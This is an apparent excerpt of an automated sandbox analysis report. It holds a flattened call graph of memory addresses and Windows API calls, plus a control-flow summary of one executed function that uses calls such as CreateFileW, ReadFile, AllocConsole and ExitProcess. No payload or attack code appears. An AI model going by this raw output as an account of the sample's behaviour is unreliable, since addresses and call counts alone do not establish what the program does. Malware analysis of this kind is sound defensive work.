_invalid_parameter_noinfo_noreturn 31 API calls 27076->27077 27081 7ff7b8efde42 27077->27081 27078 7ff7b8efddff 27080 7ff7b8f21d70 _handle_error 8 API calls 27078->27080 27082 7ff7b8efde28 27080->27082 27082->26769 27083->27078 27136 7ff7b8ef32fc 79 API calls 2 library calls 27083->27136 27086 7ff7b8f0795a 27085->27086 27087 7ff7b8f21c20 4 API calls 27086->27087 27088 7ff7b8f0797f 27087->27088 27089 7ff7b8f21c20 4 API calls 27088->27089 27090 7ff7b8f079a9 27089->27090 27090->27053 27091->27057 27092->27062 27094 7ff7b8f065d0 8 API calls 27093->27094 27095 7ff7b8f0325d 27094->27095 27096 7ff7b8f0328b 27095->27096 27137 7ff7b8f0341c 27095->27137 27096->27072 27099 7ff7b8f03276 FindClose 27099->27096 27101 7ff7b8efea59 _snwprintf 27100->27101 27163 7ff7b8ef33a8 27101->27163 27104 7ff7b8efea8d 27107 7ff7b8efecdf 27104->27107 27178 7ff7b8ef3ef4 27104->27178 27408 7ff7b8ef36e0 27107->27408 27108 7ff7b8efeab9 27108->27107 27210 7ff7b8ef45c4 27108->27210 27116 7ff7b8ef8a94 33 API calls 27117 7ff7b8efeb19 27116->27117 27428 7ff7b8f06be4 48 API calls 2 library calls 27117->27428 27120 7ff7b8efeb2e 27122 7ff7b8f03244 55 API calls 27120->27122 27121 7ff7b8efecbe 27121->27107 27226 7ff7b8ef6754 27121->27226 27234 7ff7b8efedf8 27121->27234 27126 7ff7b8efeb63 27122->27126 27128 7ff7b8efec01 27126->27128 27129 7ff7b8efed1b 27126->27129 27132 7ff7b8f03244 55 API calls 27126->27132 27429 7ff7b8f06be4 48 API calls 2 library calls 27126->27429 27128->27129 27130 7ff7b8efec7d 27128->27130 27133 7ff7b8efed16 27128->27133 27131 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 27129->27131 27220 7ff7b8efed24 27130->27220 27134 7ff7b8efed21 27131->27134 27132->27126 27135 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 27133->27135 27135->27129 27136->27078 27138 7ff7b8f03535 FindNextFileW 27137->27138 27139 7ff7b8f03459 FindFirstFileW 27137->27139 27141 7ff7b8f03556 27138->27141 27142 7ff7b8f03544 GetLastError 27138->27142 27139->27141 27143 7ff7b8f0347e 27139->27143 27144 7ff7b8ef3cac 33 API calls 27141->27144 27161 7ff7b8f03523 27142->27161 27145 7ff7b8f05d18 49 API calls 27143->27145 27146 7ff7b8f03561 27144->27146 27147 7ff7b8f034a7 27145->27147 27151 7ff7b8ef12c0 33 API calls 27146->27151 27149 7ff7b8f034ab FindFirstFileW 27147->27149 27156 7ff7b8f034ca 27147->27156 27148 7ff7b8f21d70 _handle_error 8 API calls 27150 7ff7b8f03270 27148->27150 27149->27156 27150->27096 27150->27099 27152 7ff7b8f0358e 27151->27152 27155 7ff7b8f07334 47 API calls 27152->27155 27153 7ff7b8f03512 GetLastError 27153->27161 27154 7ff7b8f03667 27158 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 27154->27158 27157 7ff7b8f0359c 27155->27157 27156->27141 27156->27153 27156->27154 27160 7ff7b8f03662 27157->27160 27157->27161 27159 7ff7b8f0366d 27158->27159 27162 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 27160->27162 27161->27148 27162->27154 27164 7ff7b8ef33c4 27163->27164 27165 7ff7b8f0793c 4 API calls 27164->27165 27166 7ff7b8ef33e5 27165->27166 27167 7ff7b8f21c20 4 API calls 27166->27167 27170 7ff7b8ef3544 27166->27170 27168 7ff7b8ef3532 27167->27168 27168->27170 27172 7ff7b8ef8cfc 35 API calls 27168->27172 27431 7ff7b8f04064 27170->27431 27172->27170 27173 7ff7b8f02058 27177 7ff7b8f01890 54 API calls 27173->27177 27174 7ff7b8f02071 27175 7ff7b8f02075 27174->27175 27445 7ff7b8efaf34 96 API calls 2 library calls 27174->27445 27175->27104 27177->27174 27207 7ff7b8f01c80 101 API calls 27178->27207 27179 7ff7b8ef4184 27446 7ff7b8ef32fc 79 API calls 2 library calls 27179->27446 27180 7ff7b8ef3f41 memcpy_s 27187 7ff7b8ef3f5e 27180->27187 27190 7ff7b8ef4111 27180->27190 27205 7ff7b8f01f60 98 API calls 27180->27205 27182 7ff7b8ef6754 125 API calls 27184 7ff7b8ef4192 27182->27184 27183 7ff7b8ef3fdc 27208 7ff7b8f01c80 101 API calls 27183->27208 27184->27182 27185 7ff7b8ef421e 27184->27185 27184->27190 27201 7ff7b8f01e50 98 API calls 27184->27201 27185->27190 27192 7ff7b8ef4254 27185->27192 27447 7ff7b8ef32fc 79 API calls 2 library calls 27185->27447 27186 7ff7b8ef4361 27186->27190 27193 7ff7b8ef3cac 33 API calls 27186->27193 27187->27179 27187->27184 27188 7ff7b8ef408d 27188->27187 27191 7ff7b8ef40e7 27188->27191 27190->27108 27191->27190 27194 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 27191->27194 27192->27186 27192->27190 27203 7ff7b8f01f60 98 API calls 27192->27203 27193->27190 27195 7ff7b8ef438f 27194->27195 27195->27108 27196 7ff7b8ef3ffb 27196->27188 27204 7ff7b8f01e50 98 API calls 27196->27204 27197 7ff7b8ef40b7 27197->27188 27209 7ff7b8f01c80 101 API calls 27197->27209 27198 7ff7b8ef6754 125 API calls 27199 7ff7b8ef42a2 27198->27199 27199->27198 27200 7ff7b8ef4317 27199->27200 27202 7ff7b8f01e50 98 API calls 27199->27202 27206 7ff7b8f01e50 98 API calls 27200->27206 27201->27184 27202->27199 27203->27199 27204->27197 27205->27183 27206->27186 27207->27180 27208->27196 27209->27188 27211 7ff7b8ef45e5 27210->27211 27217 7ff7b8ef4644 27210->27217 27448 7ff7b8ef3e88 27211->27448 27213 7ff7b8f21d70 _handle_error 8 API calls 27215 7ff7b8ef4656 27213->27215 27215->27116 27215->27130 27216 7ff7b8ef465b 27218 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 27216->27218 27217->27213 27219 7ff7b8ef4660 27218->27219 27221 7ff7b8efed4f 27220->27221 27669 7ff7b8f07abc 27221->27669 27223 7ff7b8efed7e 27673 7ff7b8f0e6d0 GetSystemTime SystemTimeToFileTime 27223->27673 27227 7ff7b8ef6766 27226->27227 27228 7ff7b8ef676a 27226->27228 27227->27121 27233 7ff7b8f01f60 98 API calls 27228->27233 27229 7ff7b8ef6777 27229->27227 27682 7ff7b8ef5b70 27229->27682 27231 7ff7b8ef6791 27231->27227 27769 7ff7b8ef5124 79 API calls 27231->27769 27233->27229 27236 7ff7b8efee44 27234->27236 27235 7ff7b8efee78 27237 7ff7b8f005a2 27235->27237 27241 7ff7b8efeef1 27235->27241 27246 7ff7b8efee8f 27235->27246 27236->27235 27236->27241 27938 7ff7b8f159ac 130 API calls 3 library calls 27236->27938 27239 7ff7b8f005fa 27237->27239 27240 7ff7b8f005a7 27237->27240 27239->27241 27985 7ff7b8f159ac 130 API calls 3 library calls 27239->27985 27240->27241 27984 7ff7b8efd224 163 API calls 27240->27984 27242 7ff7b8f21d70 _handle_error 8 API calls 27241->27242 27244 7ff7b8f005dd 27242->27244 27244->27121 27246->27241 27806 7ff7b8ef96dc 27246->27806 27248 7ff7b8efef95 27821 7ff7b8f0523c 27248->27821 27409 7ff7b8ef3714 27408->27409 27410 7ff7b8ef3700 27408->27410 27411 7ff7b8ef1fa8 31 API calls 27409->27411 27410->27409 28097 7ff7b8ef380c 27410->28097 27414 7ff7b8ef372d 27411->27414 27427 7ff7b8ef37f0 27414->27427 28127 7ff7b8ef3b1c 31 API calls _invalid_parameter_noinfo_noreturn 27414->28127 27415 7ff7b8ef3794 28128 7ff7b8ef3b1c 31 API calls _invalid_parameter_noinfo_noreturn 27415->28128 27416 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 27418 7ff7b8ef3808 27416->27418 27419 7ff7b8ef37a0 27420 7ff7b8ef1fa8 31 API calls 27419->27420 27421 7ff7b8ef37ac 27420->27421 28129 7ff7b8f079dc 27421->28129 27427->27416 27428->27120 27429->27126 27430 7ff7b8f0ff98 91 API calls _handle_error 27430->27121 27432 7ff7b8f04092 memcpy_s 27431->27432 27441 7ff7b8f03f0c 27432->27441 27434 7ff7b8f040c7 27435 7ff7b8f04103 27434->27435 27438 7ff7b8f04121 27434->27438 27436 7ff7b8f21d70 _handle_error 8 API calls 27435->27436 27437 7ff7b8ef35be 27436->27437 27437->27104 27437->27173 27439 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 27438->27439 27440 7ff7b8f04126 27439->27440 27442 7ff7b8f03f8f BuildCatchObjectHelperInternal 27441->27442 27443 7ff7b8f03f87 27441->27443 27442->27434 27444 7ff7b8ef1fa8 31 API calls 27443->27444 27444->27442 27445->27175 27446->27190 27447->27192 27449 7ff7b8ef3ea6 27448->27449 27450 7ff7b8ef3eaa 27448->27450 27449->27216 27449->27217 27454 7ff7b8ef3da4 27450->27454 27453 7ff7b8f01e50 98 API calls 27453->27449 27455 7ff7b8ef3dc5 27454->27455 27457 7ff7b8ef3dfd 27454->27457 27456 7ff7b8ef6754 125 API calls 27455->27456 27462 7ff7b8ef3de5 27456->27462 27464 7ff7b8ef6bd0 27457->27464 27462->27453 27468 7ff7b8ef6bf3 27464->27468 27465 7ff7b8ef6754 125 API calls 27465->27468 27466 7ff7b8ef3e24 27466->27462 27469 7ff7b8ef43ec 27466->27469 27468->27465 27468->27466 27493 7ff7b8f0e174 27468->27493 27501 7ff7b8ef67c0 27469->27501 27471 7ff7b8ef4575 27475 7ff7b8f21d70 _handle_error 8 API calls 27471->27475 27472 7ff7b8ef4433 27473 7ff7b8ef4471 27472->27473 27474 7ff7b8ef4482 27472->27474 27491 7ff7b8ef4437 27472->27491 27533 7ff7b8f10344 27473->27533 27477 7ff7b8ef448b 27474->27477 27484 7ff7b8ef44d4 27474->27484 27476 7ff7b8ef3e34 27475->27476 27476->27462 27492 7ff7b8ef32fc 79 API calls 2 library calls 27476->27492 27537 7ff7b8f1026c 33 API calls 27477->27537 27478 7ff7b8ef459e 27480 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 27478->27480 27482 7ff7b8ef45a3 27480->27482 27485 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 27482->27485 27483 7ff7b8ef4498 27486 7ff7b8ef1fa8 31 API calls 27483->27486 27490 7ff7b8ef44a8 BuildCatchObjectHelperInternal 27483->27490 27538 7ff7b8f100ec 34 API calls _invalid_parameter_noinfo_noreturn 27484->27538 27489 7ff7b8ef45a9 27485->27489 27486->27490 27487 7ff7b8ef1fa8 31 API calls 27487->27491 27490->27487 27491->27471 27491->27478 27491->27482 27492->27462 27494 7ff7b8f0e17d 27493->27494 27495 7ff7b8f0e197 27494->27495 27499 7ff7b8efadc8 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task 27494->27499 27497 7ff7b8f0e1b1 SetThreadExecutionState 27495->27497 27500 7ff7b8efadc8 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task 27495->27500 27499->27495 27500->27497 27502 7ff7b8ef67da _snwprintf 27501->27502 27503 7ff7b8ef6826 27502->27503 27504 7ff7b8ef6806 27502->27504 27506 7ff7b8ef6a8f 27503->27506 27510 7ff7b8ef6851 27503->27510 27577 7ff7b8ef32fc 79 API calls 2 library calls 27504->27577 27606 7ff7b8ef32fc 79 API calls 2 library calls 27506->27606 27508 7ff7b8ef6812 27509 7ff7b8f21d70 _handle_error 8 API calls 27508->27509 27511 7ff7b8ef6aaf 27509->27511 27510->27508 27539 7ff7b8f1172c 27510->27539 27511->27472 27514 7ff7b8ef68c8 27517 7ff7b8ef696d 27514->27517 27532 7ff7b8ef68be 27514->27532 27583 7ff7b8f07bb8 106 API calls 27514->27583 27515 7ff7b8ef68c3 27515->27514 27579 7ff7b8ef4b44 27515->27579 27516 7ff7b8ef68b0 27578 7ff7b8ef32fc 79 API calls 2 library calls 27516->27578 27548 7ff7b8f03ac0 27517->27548 27520 7ff7b8ef698c 27524 7ff7b8ef69fe 27520->27524 27525 7ff7b8ef6a0c 27520->27525 27552 7ff7b8f00ba0 27524->27552 27584 7ff7b8f116b8 27525->27584 27528 7ff7b8ef6a0a 27604 7ff7b8f03a60 8 API calls _handle_error 27528->27604 27567 7ff7b8f10f80 27532->27567 27535 7ff7b8f1037c 27533->27535 27534 7ff7b8f10538 27534->27491 27535->27534 27536 7ff7b8ef1754 33 API calls 27535->27536 27536->27535 27537->27483 27538->27491 27540 7ff7b8f1176f std::bad_alloc::bad_alloc 27539->27540 27541 7ff7b8f11853 std::bad_alloc::bad_alloc 27539->27541 27544 7ff7b8f117c5 std::bad_alloc::bad_alloc 27540->27544 27545 7ff7b8ef689b 27540->27545 27608 7ff7b8f23020 RtlPcToFileHeader RaiseException 27540->27608 27607 7ff7b8f23020 RtlPcToFileHeader RaiseException 27541->27607 27544->27545 27609 7ff7b8f23020 RtlPcToFileHeader RaiseException 27544->27609 27545->27514 27545->27515 27545->27516 27547 7ff7b8f118a5 27549 7ff7b8f03ae0 27548->27549 27551 7ff7b8f03aea 27548->27551 27550 7ff7b8f21c20 4 API calls 27549->27550 27550->27551 27551->27520 27553 7ff7b8f00bca memcpy_s 27552->27553 27610 7ff7b8f07c98 27553->27610 27568 7ff7b8f10fad 27567->27568 27570 7ff7b8f10fcc 27568->27570 27630 7ff7b8f0e2b0 27568->27630 27574 7ff7b8f11003 27570->27574 27626 7ff7b8f21dbc 27570->27626 27572 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 27573 7ff7b8f11256 27572->27573 27576 7ff7b8f11165 27574->27576 27637 7ff7b8f09c08 31 API calls _invalid_parameter_noinfo_noreturn 27574->27637 27576->27572 27577->27508 27578->27532 27580 7ff7b8ef4b71 27579->27580 27581 7ff7b8ef4b6b memcpy_s 27579->27581 27580->27581 27638 7ff7b8ef4bb4 33 API calls 2 library calls 27580->27638 27581->27514 27583->27517 27585 7ff7b8f116c1 27584->27585 27586 7ff7b8f116f5 27585->27586 27587 7ff7b8f116ed 27585->27587 27588 7ff7b8f116e1 27585->27588 27586->27528 27660 7ff7b8f1319c 140 API calls 27587->27660 27639 7ff7b8f118a8 27588->27639 27606->27508 27607->27540 27608->27544 27609->27547 27611 7ff7b8f07e1d 27610->27611 27616 7ff7b8f07ce1 BuildCatchObjectHelperInternal 27610->27616 27615 7ff7b8f159ac 130 API calls 27615->27616 27616->27611 27616->27615 27617 7ff7b8f07e6f 27616->27617 27618 7ff7b8f03be8 105 API calls 27616->27618 27619 7ff7b8f01c80 101 API calls 27616->27619 27618->27616 27619->27616 27627 7ff7b8f21def 27626->27627 27628 7ff7b8f21e18 27627->27628 27629 7ff7b8f10f80 105 API calls 27627->27629 27628->27574 27629->27627 27631 7ff7b8f0e638 100 API calls 27630->27631 27632 7ff7b8f0e2c7 ReleaseSemaphore 27631->27632 27633 7ff7b8f0e30b DeleteCriticalSection CloseHandle CloseHandle 27632->27633 27634 7ff7b8f0e2ec 27632->27634 27635 7ff7b8f0e3c4 98 API calls 27634->27635 27636 7ff7b8f0e2f6 CloseHandle 27635->27636 27636->27633 27636->27634 27637->27576 27641 7ff7b8f118c4 memcpy_s 27639->27641 27660->27586 27670 7ff7b8f07ad2 27669->27670 27671 7ff7b8f07ae2 27669->27671 27676 7ff7b8f017f0 27670->27676 27671->27223 27674 7ff7b8f21d70 _handle_error 8 API calls 27673->27674 27675 7ff7b8efec8e 27674->27675 27675->27121 27675->27430 27677 7ff7b8f0180f 27676->27677 27680 7ff7b8f01e50 98 API calls 27677->27680 27678 7ff7b8f01828 27681 7ff7b8f01f60 98 API calls 27678->27681 27679 7ff7b8f01838 27679->27671 27680->27678 27681->27679 27683 7ff7b8ef5bb3 27682->27683 27685 7ff7b8ef5bed 27683->27685 27689 7ff7b8ef5c00 27683->27689 27732 7ff7b8ef5dcf 27683->27732 27780 7ff7b8ef32fc 79 API calls 2 library calls 27685->27780 27687 7ff7b8ef5e7e 27787 7ff7b8ef6d2c 79 API calls 27687->27787 27689->27687 27690 7ff7b8ef5c8d 27689->27690 27781 7ff7b8ef6c98 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection BuildCatchObjectHelperInternal 27689->27781 27782 7ff7b8ef6acc 79 API calls 27690->27782 27691 7ff7b8ef670a 27692 7ff7b8f21d70 _handle_error 8 API calls 27691->27692 27694 7ff7b8ef671e 27692->27694 27694->27231 27696 7ff7b8ef673f 27698 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 27696->27698 27697 7ff7b8ef66ce 27799 7ff7b8ef5124 79 API calls 27697->27799 27700 7ff7b8ef6744 27698->27700 27699 7ff7b8ef5e78 27699->27687 27699->27697 27705 7ff7b8f07840 101 API calls 27699->27705 27703 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 27700->27703 27706 7ff7b8ef674a 27703->27706 27704 7ff7b8ef5d79 27708 7ff7b8f21dbc 105 API calls 27704->27708 27704->27732 27707 7ff7b8ef5ef0 27705->27707 27709 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 27706->27709 27707->27687 27710 7ff7b8ef5db7 27708->27710 27711 7ff7b8ef6750 27709->27711 27733 7ff7b8ef6766 27711->27733 27768 7ff7b8f01f60 98 API calls 27711->27768 27713 7ff7b8ef5de2 27786 7ff7b8ef4df4 79 API calls 2 library calls 27713->27786 27716 7ff7b8ef6777 27719 7ff7b8ef5b70 125 API calls 27716->27719 27716->27733 27717 7ff7b8ef5ca6 27717->27704 27717->27713 27783 7ff7b8ef4df4 79 API calls 2 library calls 27717->27783 27784 7ff7b8ef6acc 79 API calls 27717->27784 27785 7ff7b8ef9ce0 106 API calls _handle_error 27717->27785 27722 7ff7b8ef5dec 27725 7ff7b8f21dbc 105 API calls 27722->27725 27764 7ff7b8ef5bfb 27722->27764 27732->27764 27770 7ff7b8f07840 27732->27770 27733->27231 27764->27691 27764->27696 27764->27706 27768->27716 27771 7ff7b8f07864 27770->27771 27772 7ff7b8f078ea 27770->27772 27774 7ff7b8ef4b44 33 API calls 27771->27774 27777 7ff7b8f078cc 27771->27777 27773 7ff7b8ef4b44 33 API calls 27772->27773 27772->27777 27775 7ff7b8f07903 27773->27775 27776 7ff7b8f0789d 27774->27776 27779 7ff7b8f01c80 101 API calls 27775->27779 27801 7ff7b8ef9cb4 27776->27801 27777->27699 27779->27777 27780->27764 27782->27717 27783->27717 27784->27717 27785->27717 27786->27722 27787->27764 27802 7ff7b8ef9cc5 27801->27802 27811 7ff7b8ef9713 27806->27811 27807 7ff7b8f21d70 _handle_error 8 API calls 27808 7ff7b8ef9802 27807->27808 27808->27248 27812 7ff7b8ef9747 27811->27812 27813 7ff7b8ef97b5 27811->27813 27815 7ff7b8ef9813 27811->27815 27986 7ff7b8f04620 27811->27986 28004 7ff7b8f0d384 27811->28004 27812->27807 27813->27812 27814 7ff7b8ef9842 27813->27814 27817 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 27814->27817 27816 7ff7b8ef9824 27815->27816 28008 7ff7b8f0d26c CompareStringW 27815->28008 27816->27813 27820 7ff7b8ef3cac 33 API calls 27816->27820 27818 7ff7b8ef9847 27817->27818 27820->27813 27829 7ff7b8f05273 27821->27829 27822 7ff7b8f05502 28012 7ff7b8ef6ddc 47 API calls BuildCatchObjectHelperInternal 27822->28012 27826 7ff7b8ef12c0 33 API calls 27828 7ff7b8f05467 27826->27828 27829->27822 27829->27826 27831 7ff7b8f054d8 27829->27831 27938->27235 27984->27241 27985->27241 27987 7ff7b8f04660 27986->27987 27991 7ff7b8f0469e __vcrt_FlsAlloc 27987->27991 27997 7ff7b8f046c5 __vcrt_FlsAlloc 27987->27997 28009 7ff7b8f10b08 CompareStringW 27987->28009 27988 7ff7b8f21d70 _handle_error 8 API calls 27990 7ff7b8f04892 27988->27990 27990->27811 27993 7ff7b8f0470e __vcrt_FlsAlloc 27991->27993 27991->27997 28010 7ff7b8f10b08 CompareStringW 27991->28010 27994 7ff7b8ef12c0 33 API calls 27993->27994 27995 7ff7b8f047c8 27993->27995 27993->27997 27996 7ff7b8f047b5 27994->27996 27998 7ff7b8f04818 27995->27998 28000 7ff7b8f048aa 27995->28000 27999 7ff7b8f065d0 8 API calls 27996->27999 27997->27988 27998->27997 28011 7ff7b8f10b08 CompareStringW 27998->28011 27999->27995 28002 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 28000->28002 28003 7ff7b8f048af 28002->28003 28005 7ff7b8f0d397 28004->28005 28006 7ff7b8f0d3a8 28005->28006 28007 7ff7b8ef20c0 33 API calls 28005->28007 28006->27811 28007->28006 28008->27816 28009->27991 28010->27993 28011->27997 28100 7ff7b8ef3831 28097->28100 28099 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 28101 7ff7b8ef3ad1 28099->28101 28126 7ff7b8ef3ab1 28100->28126 28143 7ff7b8f0b12c 31 API calls _invalid_parameter_noinfo_noreturn 28100->28143 28102 7ff7b8f21dbc 105 API calls 28101->28102 28103 7ff7b8ef3afb 28102->28103 28104 7ff7b8f21dbc 105 API calls 28103->28104 28106 7ff7b8ef3b13 28104->28106 28105 7ff7b8ef1fa8 31 API calls 28108 7ff7b8ef3a45 28105->28108 28106->27409 28107 7ff7b8ef3886 28107->28105 28107->28126 28109 7ff7b8ef1fa8 31 API calls 28108->28109 28110 7ff7b8ef3a51 28109->28110 28111 7ff7b8ef1fa8 31 API calls 28110->28111 28112 7ff7b8ef3a5d 28111->28112 28113 7ff7b8ef1fa8 31 API calls 28112->28113 28114 7ff7b8ef3a69 28113->28114 28115 7ff7b8ef1fa8 31 API calls 28114->28115 28116 7ff7b8ef3a75 28115->28116 28117 7ff7b8ef1fa8 31 API calls 28116->28117 28118 7ff7b8ef3a81 28117->28118 28119 7ff7b8ef1fa8 31 API calls 28118->28119 28120 7ff7b8ef3a8d 28119->28120 28121 7ff7b8ef1fa8 31 API calls 28120->28121 28122 7ff7b8ef3a99 28121->28122 28123 7ff7b8ef1fa8 31 API calls 28122->28123 28124 7ff7b8ef3aa5 28123->28124 28125 7ff7b8ef1fa8 31 API calls 28124->28125 28125->28126 28126->28099 28127->27415 28128->27419 28130 7ff7b8f079ff 28129->28130 28141 7ff7b8f07a2f 28129->28141 28131 7ff7b8f21dbc 105 API calls 28130->28131 28134 7ff7b8f07a1a 28131->28134 28132 7ff7b8f21dbc 105 API calls 28135 7ff7b8f07a64 28132->28135 28137 7ff7b8f21dbc 105 API calls 28134->28137 28138 7ff7b8f21dbc 105 API calls 28135->28138 28136 7ff7b8f07a95 28139 7ff7b8f03970 105 API calls 28136->28139 28137->28141 28142 7ff7b8f07a7b 28138->28142 28140 7ff7b8f07aa1 28139->28140 28141->28132 28141->28142 28144 7ff7b8f03970 28142->28144 28143->28107 28145 7ff7b8f03986 28144->28145 28146 7ff7b8f0398e 28144->28146 28147 7ff7b8f0e2b0 105 API calls 28145->28147 28146->28136 28147->28146 28148->26781 28149->26787 28150->26790 28151 7ff7b8f1fc10 28152 7ff7b8f1fccc 28151->28152 28153 7ff7b8f1fc54 28151->28153 28155 7ff7b8f0a008 58 API calls 28152->28155 28154 7ff7b8f0a008 58 API calls 28153->28154 28157 7ff7b8f1fc68 28154->28157 28156 7ff7b8f1fce0 28155->28156 28158 7ff7b8f0d2bc 48 API calls 28156->28158 28159 7ff7b8f0d2bc 48 API calls 28157->28159 28163 7ff7b8f1fc77 BuildCatchObjectHelperInternal 28158->28163 28159->28163 28160 7ff7b8ef1fa8 31 API calls 28161 7ff7b8f1fd78 28160->28161 28165 7ff7b8ef2678 SetDlgItemTextW 28161->28165 28162 7ff7b8f1fe03 28167 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 28162->28167 28163->28160 28163->28162 28164 7ff7b8f1fdfd 28163->28164 28166 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 28164->28166 28168 7ff7b8f1fd8d SetWindowTextW 28165->28168 28166->28162 28171 7ff7b8f1fe09 28167->28171 28169 7ff7b8f1fdd3 28168->28169 28170 7ff7b8f1fda6 28168->28170 28172 7ff7b8f21d70 _handle_error 8 API calls 28169->28172 28170->28169 28173 7ff7b8f1fdf8 28170->28173 28174 7ff7b8f1fde6 28172->28174 28175 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 28173->28175 28175->28164 28176 7ff7b8f21be1 28177 7ff7b8f21b68 28176->28177 28178 7ff7b8f21330 _com_raise_error 14 API calls 28177->28178 28179 7ff7b8f21ba7 28178->28179

                                                                                    Executed Functions

                                                                                    Function 00007FF7B8F0D7F8 Relevance: 143.9, APIs: 16, Strings: 66, Instructions: 442libraryfileloaderCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 0 7ff7b8f0d7f8-7ff7b8f0d84c call 7ff7b8f21ea0 GetModuleHandleW 3 7ff7b8f0d84e-7ff7b8f0d861 GetProcAddress 0->3 4 7ff7b8f0d8a3-7ff7b8f0db97 0->4 5 7ff7b8f0d87b-7ff7b8f0d88e GetProcAddress 3->5 6 7ff7b8f0d863-7ff7b8f0d872 3->6 7 7ff7b8f0dd29-7ff7b8f0dd50 call 7ff7b8f05758 call 7ff7b8f070b0 4->7 8 7ff7b8f0db9d-7ff7b8f0dba6 call 7ff7b8f2a6a8 4->8 5->4 11 7ff7b8f0d890-7ff7b8f0d8a0 5->11 6->5 20 7ff7b8f0dd55-7ff7b8f0dd5f call 7ff7b8f04518 7->20 8->7 14 7ff7b8f0dbac-7ff7b8f0dbfb call 7ff7b8f05758 CreateFileW 8->14 11->4 21 7ff7b8f0dc01-7ff7b8f0dc14 SetFilePointer 14->21 22 7ff7b8f0dd13-7ff7b8f0dd24 CloseHandle call 7ff7b8ef1fa8 14->22 27 7ff7b8f0dd61-7ff7b8f0dd6c call 7ff7b8f0d5a4 20->27 28 7ff7b8f0dd94-7ff7b8f0ddf1 call 7ff7b8f268ac call 7ff7b8ef12c0 call 7ff7b8f07334 call 7ff7b8ef1fa8 call 7ff7b8f02680 20->28 21->22 24 7ff7b8f0dc1a-7ff7b8f0dc3c ReadFile 21->24 22->7 24->22 29 7ff7b8f0dc42-7ff7b8f0dc50 24->29 27->28 38 7ff7b8f0dd6e-7ff7b8f0dd92 CompareStringW 27->38 71 7ff7b8f0ddf6-7ff7b8f0ddf9 28->71 32 7ff7b8f0e0b2-7ff7b8f0e0b7 call 7ff7b8f22074 29->32 33 7ff7b8f0dc56-7ff7b8f0dcc0 call 7ff7b8f268ac call 7ff7b8ef12c0 29->33 50 7ff7b8f0dcde-7ff7b8f0dcf8 call 7ff7b8f0c968 33->50 38->28 42 7ff7b8f0de02-7ff7b8f0de0b 38->42 42->20 45 7ff7b8f0de11 42->45 48 7ff7b8f0de16-7ff7b8f0de19 45->48 52 7ff7b8f0de99-7ff7b8f0de9c 48->52 53 7ff7b8f0de1b-7ff7b8f0de1e 48->53 60 7ff7b8f0dcfa-7ff7b8f0dd0e call 7ff7b8ef1fa8 * 2 50->60 61 7ff7b8f0dcc2-7ff7b8f0dcd9 call 7ff7b8f0d5a4 50->61 56 7ff7b8f0e06e-7ff7b8f0e0b1 call 7ff7b8ef1fa8 * 2 call 7ff7b8f21d70 52->56 57 7ff7b8f0dea2-7ff7b8f0deb8 call 7ff7b8f07170 call 7ff7b8f04518 52->57 58 7ff7b8f0de22-7ff7b8f0de87 call 7ff7b8f268ac call 7ff7b8ef12c0 call 7ff7b8f07334 call 7ff7b8ef1fa8 call 7ff7b8f02680 53->58 82 7ff7b8f0df8d-7ff7b8f0dff6 call 7ff7b8f0d2bc AllocConsole 57->82 83 7ff7b8f0debe-7ff7b8f0df88 call 7ff7b8f0d5a4 * 2 call 7ff7b8f0a008 call 7ff7b8f0d2bc call 7ff7b8f0a008 call 7ff7b8f0d440 call 7ff7b8f18030 call 7ff7b8ef19ec 57->83 106 7ff7b8f0de89-7ff7b8f0de92 58->106 107 7ff7b8f0de96 58->107 60->22 61->50 76 7ff7b8f0ddfb 71->76 77 7ff7b8f0de13 71->77 76->42 77->48 94 7ff7b8f0dff8-7ff7b8f0e053 GetCurrentProcessId AttachConsole call 7ff7b8f0e1d4 call 7ff7b8f0e1c4 GetStdHandle WriteConsoleW Sleep FreeConsole 82->94 95 7ff7b8f0e059 82->95 97 7ff7b8f0e060-7ff7b8f0e067 call 7ff7b8ef19ec ExitProcess 83->97 94->95 95->97 106->58 112 7ff7b8f0de94 106->112 107->52 112->52
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
